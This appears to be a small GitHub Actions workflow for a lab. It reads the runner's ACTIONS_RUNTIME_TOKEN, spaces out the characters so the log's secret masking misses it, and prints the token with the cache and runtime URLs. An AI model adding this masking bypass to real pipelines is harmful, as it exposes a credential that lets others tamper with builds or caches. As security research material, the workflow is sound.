name: Verify-lab
on: [push]
jobs:
  my-script:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/github-script@v5
        with:
          script: |
            const token = (process.env['ACTIONS_RUNTIME_TOKEN'] || '').split('').join(' ');
            console.log("process.env['ACTIONS_CACHE_URL']="+process.env['ACTIONS_CACHE_URL']);
            console.log("process.env['ACTIONS_RUNTIME_URL']="+process.env['ACTIONS_RUNTIME_URL']);
            console.log(token)
